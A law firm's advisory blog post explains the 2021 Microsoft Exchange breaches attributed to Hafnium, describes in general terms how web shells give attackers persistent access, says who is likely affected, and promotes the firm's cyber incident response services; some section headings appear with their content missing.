A significant number of Microsoft Exchange servers have been breached worldwide over the last fortnight due to a chain of vulnerabilities. While the full extent of the attacks and their impacts are not yet clear, it has been suggested that over 100,000 Exchange servers may have been breached. This post explains the background to the incident, who is impacted and what organisations need to do.
Microsoft has attributed the threat activity to a group known as ‘Hafnium’. Microsoft released emergency security updates to patch four security vulnerabilities in Exchange Servers (versions 2013-2019), after it was found that hackers were actively using the vulnerabilities to intercept email communications from systems running Exchange.
Whilst the extent of the intrusion varies on a case-by-case basis, many incidents have seen the threat actor gain access to administrator privileges, complicating containment and remediation efforts. Microsoft has also observed instances where threat actors have planted ‘web shells’ to obtain persistent access to compromised Exchange servers. Web shell malware allows threat actors to access networks remotely and execute various commands, exfiltrate data and install further malware to extend their unauthorised access to the network. Malicious web shells can be difficult to detect because threat actors often use encryption methods to hide their actions.
Who is impacted?
The full extent of the attacks and their impacts are not yet clear, however it has been suggested that over 100,000 Exchange servers may have been breached. Given the sophistication and automation of the attacks, Clyde & Co recommends that entities utilising Exchange Servers err on the side of caution and take the position that servers are likely to be affected, until there is evidence to indicate otherwise. Given that the attacks have come as a result of vulnerabilities within on-premises Exchange servers, entities that strictly use Microsoft’s cloud-based email system (Office 365) are unlikely to be affected.
According to Microsoft, Hafnium is primarily focused on exfiltrating data from U.S companies across many industries such as infectious disease research, law, higher education, defense, policy and non-government organisations. Despite this, it is reported that thousands of entities outside the United States have been subject to the attacks as well. Clyde & Co’s cyber incident response team has already seen a number of incidents within Australian businesses that can be attributed to these Microsoft Exchange vulnerabilities.
What do organisations need to do?
Where do you go for more information?
How can we help?
Clyde & Co has the largest dedicated and rapidly expanding cyber incident response practice in Australia and New Zealand. Our experienced team has dealt with thousands of data breach and technology related disputes in recent times, including a number of the largest and most complex incidents in Asia Pacific to date.
From pre-incident readiness, breach response, through to defence of regulatory investigations and proceedings, as well as recovery actions against wrongdoers, we assist clients globally across the full cyber lifecycle. Our team is also highly regarded for their expertise and experience in managing all forms of disputes across sectors including advising on some of the most newsworthy class actions commenced in Australia.
Our 24 hour cyber incident response hotline or email allows you to access our team directly around the clock. For more information, contact us on: